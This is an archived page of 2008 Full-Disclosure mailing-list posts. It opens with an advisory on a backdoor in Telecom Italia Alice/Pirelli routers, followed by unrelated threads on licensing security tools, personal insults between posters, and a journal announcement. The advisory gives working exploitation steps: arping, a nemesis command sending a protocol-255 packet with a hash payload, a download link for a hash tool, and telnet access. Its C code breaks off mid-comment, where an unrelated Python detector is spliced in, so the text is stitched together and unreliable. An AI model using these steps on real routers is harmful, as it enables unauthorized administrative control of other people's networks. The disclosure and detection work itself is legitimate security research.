[Full-disclosure] Telecom Italia Alice Pirelli routers backdoor discovered to activate telnet/ftp/tftp from internal LAN/WLAN.

2008-10-13 Thread drpepperONE drpepperONE
#

  saxdax & drpepperONE


Discovered embedded backdoor to activate telnet/ftp/tftp/web extended
admin interface with Admin privileges, from the internal network LAN on
Alice ADSL CPE Modem/Router, manufactured by Pirelli, based on Broadcom platform.

#

  saxdax & drpepperONE

Router Vendor:  Alice Telecom Italia CPE Modem/Routers
manufactured by Pirelli, based on Broadcom platform.

Model Affected: AGA [Alice Gate2 plus Wi-Fi] / AGB [Alice Gate2 plus] /
AG2P-AG3 [Alice Gate W2+] / AGPV-AGPF [Alice Gate VoIP 2 Plus Wi-Fi]

Firmware Version: All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware versions
are affected.

Platforms: Customized Linux version 2.6.8.1 on
Broadcom BCM96348 chipset.

Vulnerability: enable telnet/ftp/tftp and web-admin
from internal LAN.

Exploitation:  from internal network LAN, against the router

Date: 13 Oct 2008

Authors:   saxdax & drpepperONE

e-mail: [EMAIL PROTECTED]   [EMAIL PROTECTED]

Risk:   medium>low

#

1) Introduction
2) Vulnerability
3) The Exploit
4) The Code
5) Fix

#

===
1) Introduction
===

Telecom Italia is the most important Italian ISP, offering an ADSL
service named "Alice".
Telecom Italia rents out, with the "Alice Adsl" service, different CPE
Modem/Routers, among which the affected ones.
The interface to configure these modems is made extremely poor by the
provider to ensure more control.
There's no way to enable telnet, ftp, tftp or more advanced web pages
from the web interface.

http://www.telecomitalia.com/
http://adsl.alice.it/

#


===
2) Vulnerability
===


An attacker can activate and get unauthorized access to the router's
administration interface and telnet/ftp/tftp services from the internal network.

Every user in the LAN (or Wireless LAN) can nevertheless have access
to the router's administration interface and telnet/ftp/tftp!

If an attacker can get access to the administrator interface and
login, he has full control over the router's configuration.

#


==
3) The Exploit
==

To enable telnet/ftp/tftp and the web-admin interface it is necessary to send a special
IP packet to the router's specific IP 192.168.1.1.
This works only from the internal LAN, where an attacker has an IP like
192.168.1.XX.
The IP packet sent to the router must have the following features:

1) IP protocol number 255 (there's a RAW SOCKET listening on the router)
2) Payload size 8 bytes
3) The payload is the first 8 bytes of a salted MD5 of the MAC address
of device br0
4) br0 in these modems has the same MAC as eth0

When the modem receives the packet all services will be enabled.


Example:


From a GNU/Linux distribution:

1) Retrieve the br0 MAC address:

arping -I eth0 -c 2 192.168.1.1

ARPING 192.168.1.1 from 192.168.1.2 eth0
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  8.419ms
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  2.095ms
Sent 2 probes (1 broadcast(s))
Received 2 response(s)


2) Calculate the special MD5 hash from the br0 MAC address: create a
hex file 6 bytes long with the MAC address,
  run the application below and copy the output hash.
  http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html

3) Send the IP packet to router IP 192.168.1.1 with the 8-byte payload file
(with the tool you like)

  i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex


4) Telnet to the router:

  telnet 192.168.1.1

  BCM96348 ADSL Router
  Login: admin
  Password:



#


===
4) The Code
===

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the payload of the ip packet   */
/* the mac must be in a hex file and has to be passed as argument to the program */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "md5.h"


/*
 *  RFC 1321 compliant MD5 implementation
 *
 *  Copyright (C) 2001-2003  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  b
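The activation packet described in section 3 above (IP protocol number 255, exactly 8 bytes of payload, sent to the router's LAN address) can be recognised on the wire without knowing the hash salt, so a LAN sensor can alert on it. The following Python detector is an added example, not part of the advisory or of its authors' tool: it parses bare IPv4 packets and flags that pattern; the 192.168.1.1 address comes from the advisory, while the sample packets, their source address and the 8-byte payload are constructed for illustration.

```python
import socket
import struct
from dataclasses import dataclass

# Trigger pattern as described in the advisory: raw-socket listener for IP
# protocol number 255, payload of exactly 8 bytes, router at 192.168.1.1.
BACKDOOR_PROTO = 255
BACKDOOR_PAYLOAD_LEN = 8
ROUTER_IP = "192.168.1.1"

@dataclass
class IPv4Packet:
    src: str
    dst: str
    proto: int
    payload: bytes

def parse_ipv4(raw: bytes) -> IPv4Packet:
    """Parse a bare IPv4 packet (no link-layer header) into its fields."""
    if len(raw) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, total_len, _ident, _flags, _ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (ver_ihl & 0x0F) * 4  # header length, IP options included
    if ihl < 20 or total_len < ihl or len(raw) < total_len:
        raise ValueError("inconsistent IPv4 length fields")
    # Slice by total_len, not len(raw): link-layer padding after a short
    # packet must not be counted as payload, or the 8-byte check misses.
    return IPv4Packet(socket.inet_ntoa(src), socket.inet_ntoa(dst),
                      proto, raw[ihl:total_len])

def is_backdoor_trigger(pkt: IPv4Packet, router_ip: str = ROUTER_IP) -> bool:
    """True when a packet matches the service-activation pattern."""
    return (pkt.dst == router_ip and pkt.proto == BACKDOOR_PROTO
            and len(pkt.payload) == BACKDOOR_PAYLOAD_LEN)

def scan(packets) -> list:
    """Return one alert line per packet that matches the trigger pattern."""
    alerts = []
    for raw in packets:
        try:
            pkt = parse_ipv4(raw)
        except ValueError:
            continue  # malformed packet: skipped, not alerted on
        if is_backdoor_trigger(pkt):
            alerts.append(f"backdoor trigger: {pkt.src} -> {pkt.dst} "
                          f"proto {pkt.proto} payload {pkt.payload.hex()}")
    return alerts

def sample_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Minimal IPv4 packet for the constructed samples (checksum left zero)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0x4000,
                      64, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + payload

# Constructed samples (not real captures): a TCP segment to the router, a
# protocol-255 packet of the wrong size, and one matching the pattern with a
# made-up 8-byte payload (the real value depends on the undisclosed salt).
SAMPLE_PACKETS = [
    sample_ipv4("192.168.1.2", ROUTER_IP, 6, b"\x00" * 20),
    sample_ipv4("192.168.1.2", ROUTER_IP, BACKDOOR_PROTO, b"\x00" * 16),
    sample_ipv4("192.168.1.2", ROUTER_IP, BACKDOOR_PROTO, bytes(range(1, 9))),
]

if __name__ == "__main__":
    for line in scan(SAMPLE_PACKETS):
        print(line)
```

In a deployment the bytes would come from a sniffer on the LAN segment (with the Ethernet header stripped) rather than from the constructed list; the padding-safe length handling is what keeps short trigger packets from being missed.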

Re: [Full-disclosure] security industry software license

2008-10-13 Thread Paul Ferguson

On Mon, Oct 13, 2008 at 6:43 PM, rysheve <[EMAIL PROTECTED]> wrote:

> So are you talking about Actionable Intelligence? Why should the
> government be gathering any intelligence on me unless I am the target
> of an investigation? Maybe I should also have to register my I.D. to
> any device that I connect to the Internet. I bet that would provide
> lots of actionable intelligence.
>

For what it's worth, the FBI now does not need a reason to investigate
anyone:

http://centerforinvestigativereporting.org/blogpost/20081006broaderfbipower
snowsetinstone

Enjoy!

- - ferg




-- 
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] actionable intelligence

2008-10-13 Thread n3td3v
What would the scheme be?

On Tue, Oct 14, 2008 at 2:46 AM, vulcanius <[EMAIL PROTECTED]> wrote:
> You should pursue something more realistic, like getting the FD list
> moderated.
>
> On Mon, Oct 13, 2008 at 9:22 PM, n3td3v <[EMAIL PROTECTED]> wrote:
>>
>> how can we start to make intelligence actionable? how can we take
>> intelligence from an idle state into an actionable state? what kind of
>> schemes can we setup to make intelligence more actionable to locker
>> out the bad guys? what can we do as a community to get more of the
>> intelligence that is already held about people, more actionable? i'll
>> leave you with those kind of thoughts as we move forward.



Re: [Full-disclosure] security industry software license

2008-10-13 Thread rysheve
So are you talking about Actionable Intelligence? Why should the  
government be gathering any intelligence on me unless I am the target  
of an investigation? Maybe I should also have to register my I.D. to  
any device that I connect to the Internet. I bet that would provide  
lots of actionable intelligence.

Your proposal does not solve any problems, it only creates government
bloat. If you restrict the use of these tools it complicates the
ability for the 'good guys' to get them, not the 'bad guys'.

Sent from my iPhone

On Oct 13, 2008, at 8:00 PM, n3td3v <[EMAIL PROTECTED]> wrote:

> The intelligence about who downloads metasploit is already there, but
> currently it is not actionable intelligence.
>
> The license scheme would start to make that intelligence actionable,
> without the scheme, you've got intelligence sitting there that can't
> be used in an actionable way.
>
> It's all about making intelligence that is already held actionable.
>
> You've got known cyber criminals and terrorists downloading
> metasploit, but no legislation in place where the good guys can
> benefit and the bad guys be lockered out.
>
> We got to get this situation sorted, the intelligence is there, but
> nothing actionable can be done with it.
>
> We've got to get this license scheme implemented sooner rather than  
> later.
>
> n3td3v



Re: [Full-disclosure] actionable intelligence

2008-10-13 Thread vulcanius
You should pursue something more realistic, like getting the FD list
moderated.

On Mon, Oct 13, 2008 at 9:22 PM, n3td3v <[EMAIL PROTECTED]> wrote:

> how can we start to make intelligence actionable? how can we take
> intelligence from an idle state into an actionable state? what kind of
> schemes can we setup to make intelligence more actionable to locker
> out the bad guys? what can we do as a community to get more of the
> intelligence that is already held about people, more actionable? i'll
> leave you with those kind of thoughts as we move forward.

[Full-disclosure] actionable intelligence

2008-10-13 Thread n3td3v
how can we start to make intelligence actionable? how can we take
intelligence from an idle state into an actionable state? what kind of
schemes can we setup to make intelligence more actionable to locker
out the bad guys? what can we do as a community to get more of the
intelligence that is already held about people, more actionable? i'll
leave you with those kind of thoughts as we move forward.



Re: [Full-disclosure] security industry software license

2008-10-13 Thread n3td3v
The intelligence about who downloads metasploit is already there, but
currently it is not actionable intelligence.

The license scheme would start to make that intelligence actionable,
without the scheme, you've got intelligence sitting there that can't
be used in an actionable way.

It's all about making intelligence that is already held actionable.

You've got known cyber criminals and terrorists downloading
metasploit, but no legislation in place where the good guys can
benefit and the bad guys be lockered out.

We got to get this situation sorted, the intelligence is there, but
nothing actionable can be done with it.

We've got to get this license scheme implemented sooner rather than later.

n3td3v



Re: [Full-disclosure] security industry software license

2008-10-13 Thread n3td3v
On Mon, Oct 13, 2008 at 11:00 AM, Michael Simpson
<[EMAIL PROTECTED]> wrote:
> On 10/13/08, n3td3v <[EMAIL PROTECTED]> wrote:
>> On Mon, Oct 13, 2008 at 2:58 AM, vulcanius <[EMAIL PROTECTED]> wrote:
>> > Do you honestly believe such a thing could ever happen or are you just 
>> > speculating for no reason?
>>
>> No I wasn't on drugs when I wrote this email... but mike simpson my
>> new stalker might speculate.
>
> you wish!
>
> you appear to be the one desperate to meet up
>
>>if you want to meet up to sort out your issue, then arrange a
>>date...im sick of you spear targeting me, fuck off.
>
> lol you wanna hurt me :-)
> not sure about the phallic connotations though especially as you seem
> so homophobic in some of your other replies
>
>>Like said previously, im just a bedroom person, I have no power or
>>ability to carry this ambition out, but there may be folks on the list
>>who do, thats the kind of people im trying to influence right now.
>>
>>So while n3td3v has no power or ability, he still has a chance of
>>being an influential figure, either now or in the future.
>
> 
>
>>i had to get this http://www.disclosurescotland.co.uk/aboutds.htm to
>>go on an ethical hacking security course, maybe we can use the same
>>thing for the security industry software license?
>
> whoop-di-doo you don't have a criminal record *yet*
> i'm guessing that most of your l33t hacker mates don't have one either
>
> the big problem with the scottish criminal records office check is
> that it only show people that have been caught and successfully
> prosecuted
> i'm not even sure if the "not proven" verdict gets recorded there
>
> As various people have stated this idea is a non-starter. Move onto
> the next item of the infamous n3td3v agenda.
> Or go and get a job ffs
> In some countries people are ashamed of being unemployed and
> subsisting on state handouts.
>
> I don't mind supporting people that are attempting to move on in their
> lives or who are genuinely unwell, indeed i do it gladly but i have a
> problem with spending tax dollars on eejits that think the world owes
> them something because deep down they feel *so* important.
>
> mike
>

* I'm not a criminal

* I'm not mentally ill

* I'm not a terrorist

* I'm not an elite hacker

Now GTFO, stalker!



Re: [Full-disclosure] security industry software license

2008-10-13 Thread M . B . Jr .
Any OSI-based set, but without enforcing security-through-obscurity concepts.
Maybe adapting some Bell-LaPadula ideas.
There are lots of models to discuss about. The real question however is:

can we start fresh?


On Mon, Oct 13, 2008 at 1:57 PM, Buhrmaster, Gary <[EMAIL PROTECTED]> wrote:
>
>> >   * writing a whole new set of protocols to be used over a whole new
>> > independent backbone infrastructure; and
>>
>> I suggest the OSI protocol stack, for the security-through-obscurity
>> benefits.  ASN.1, anybody? :)
>>
>
> GOSIP anyone?
>
> I think the DMS was claimed to be more secure
> since it was based on OSI.
>



-- 
Marcio Barbado, Jr.



Re: [Full-disclosure] security industry software license

2008-10-13 Thread Buhrmaster, Gary
 
> >   * writing a whole new set of protocols to be used over a whole new
> > independent backbone infrastructure; and
> 
> I suggest the OSI protocol stack, for the security-through-obscurity
> benefits.  ASN.1, anybody? :)
>

GOSIP anyone?  

I think the DMS was claimed to be more secure
since it was based on OSI.



Re: [Full-disclosure] Fwd: UK government monitoring

2008-10-13 Thread Valdis . Kletnieks
On Mon, 13 Oct 2008 16:26:57 BST, n3td3v said:
> On Mon, Oct 13, 2008 at 7:31 AM,  <[EMAIL PROTECTED]> wrote:

> > Oh, it *will* help. Just not help with bringing crime down.
> 
> This in reality is nothing to do with crime, but to assist
> http://intelligence.gov.uk to do their job.

As I said - it will help, just not with crime.

> If you don't understand what I mean by that then GTFO.

If you can't learn to read what is actually written, then GTFO. 



Re: [Full-disclosure] security industry software license

2008-10-13 Thread Valdis . Kletnieks
On Mon, 13 Oct 2008 12:53:31 -0300, "M.B.Jr." said:

>   * writing a whole new set of protocols to be used over a whole new
> independent backbone infrastructure; and

I suggest the OSI protocol stack, for the security-through-obscurity
benefits.  ASN.1, anybody? :)



Re: [Full-disclosure] security industry software license

2008-10-13 Thread M . B . Jr .
Dear n3td3v, the dreamer,
concerning your suggestion -- which is a noble one -- in a wider context,
you'd better start with two things:

  * writing a whole new set of protocols to be used over a whole new
independent backbone infrastructure; and

  * convincing the world to forget about TCP.



Best regards,



On Thu, Oct 9, 2008 at 10:31 PM, n3td3v <[EMAIL PROTECTED]> wrote:
> there should be a central license that people apply for to use
> software like metasploit.
>
> all the *respected* programmers would require the license before you
> get to download.
>
> anyone can apply for a licence, however only those who meet the
> criteria get given the licence.
>
> background checks are done on you to see you are who you say you are.
>
> that you're not a cyber criminal or terrorist, and that you're going
> to be using the software for the intentions of which the product was
> designed.
>
> verbal contracts never hold ground, saying, this software is for
> testing purposes isn't any guarantee that the bad guys won't use the
> software.
>
> we need a centralised security industry software license scheme so the
> good guys can take full advantage of the tools made by creators of
> security software, while shuttering the bad guys out.
>
> to rely on a "verbal contract" for security software as a safe guard
> is no longer enough for the security industry in light of metasploit
> and other borderline "evil" purpose software.
>
> its time that members of the industry work together to form such a
> scheme, to insure a streamline programme that all the good guys can be
> part of, only letting the good guys use the software for good
> purposes.



-- 
Marcio Barbado, Jr.



Re: [Full-disclosure] security industry software license

2008-10-13 Thread n3td3v
On Mon, Oct 13, 2008 at 11:00 AM, Michael Simpson
<[EMAIL PROTECTED]> wrote:
> you appear to be the one desperate to meet up
>
>>if you want to meet up to sort out your issue, then arrange a
>>date...im sick of you spear targeting me, fuck off.
>
> lol you wanna hurt me :-)
>

you would most likely just be followed home and profiled for the next
6 months, and everything about you put into the big searchable
database...



[Full-disclosure] Uninformed Journal Release Announcement: Volume 10

2008-10-13 Thread fdlist
Uninformed is pleased to announce the release of its 10th volume which is
composed of 4 articles:

Engineering in Reverse

  - Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) 
GPS
Author: Skywing

  - Using dual-mappings to evade automated unpackers
Author: skape

Exploitation Technology

  - Analyzing local privilege escalations in win32k
Author: mxatone

  - Exploiting Tomorrow's Internet Today: Penetration testing with IPv6
Author: H D Moore

This volume of the journal can be found at: 

  http://www.uninformed.org/?v=10

About Uninformed: 

Uninformed is a non-commercial technical outlet for research in areas 
pertaining to security technologies, reverse engineering, and lowlevel 
programming.  The journal is published roughly three times a year and 
welcomes creative submissions from anyone who is interested in sharing 
knowledge.

  - The Uninformed Staff 
staff [at] uninformed.org 



Re: [Full-disclosure] Fwd: UK government monitoring

2008-10-13 Thread n3td3v
On Mon, Oct 13, 2008 at 7:31 AM,  <[EMAIL PROTECTED]> wrote:
> On Sun, 12 Oct 2008 23:17:38 PDT, James Matthews said:
>
>> I think the irony of the situation is that they have their CCTV cameras for
>> years now and they didn't bring crime down. How will this database help?
>
> Oh, it *will* help. Just not help with bringing crime down.
>

This in reality is nothing to do with crime, but to assist
http://intelligence.gov.uk to do their job.

If you don't understand what I mean by that then GTFO.



Re: [Full-disclosure] security industry software license

2008-10-13 Thread Michael Simpson
On 10/13/08, n3td3v <[EMAIL PROTECTED]> wrote:
> On Mon, Oct 13, 2008 at 2:58 AM, vulcanius <[EMAIL PROTECTED]> wrote:
> > Do you honestly believe such a thing could ever happen or are you just 
> > speculating for no reason?
>
> No I wasn't on drugs when I wrote this email... but mike simpson my
> new stalker might speculate.

you wish!

you appear to be the one desperate to meet up

>if you want to meet up to sort out your issue, then arrange a
>date...im sick of you spear targeting me, fuck off.

lol you wanna hurt me :-)
not sure about the phallic connotations though especially as you seem
so homophobic in some of your other replies

>Like said previously, im just a bedroom person, I have no power or
>ability to carry this ambition out, but there may be folks on the list
>who do, thats the kind of people im trying to influence right now.
>
>So while n3td3v has no power or ability, he still has a chance of
>being an influential figure, either now or in the future.



>i had to get this http://www.disclosurescotland.co.uk/aboutds.htm to
>go on an ethical hacking security course, maybe we can use the same
>thing for the security industry software license?

whoop-di-doo you don't have a criminal record *yet*
i'm guessing that most of your l33t hacker mates don't have one either

the big problem with the scottish criminal records office check is
that it only show people that have been caught and successfully
prosecuted
i'm not even sure if the "not proven" verdict gets recorded there

As various people have stated this idea is a non-starter. Move onto
the next item of the infamous n3td3v agenda.
Or go and get a job ffs
In some countries people are ashamed of being unemployed and
subsisting on state handouts.

I don't mind supporting people that are attempting to move on in their
lives or who are genuinely unwell, indeed i do it gladly but i have a
problem with spending tax dollars on eejits that think the world owes
them something because deep down they feel *so* important.

mike
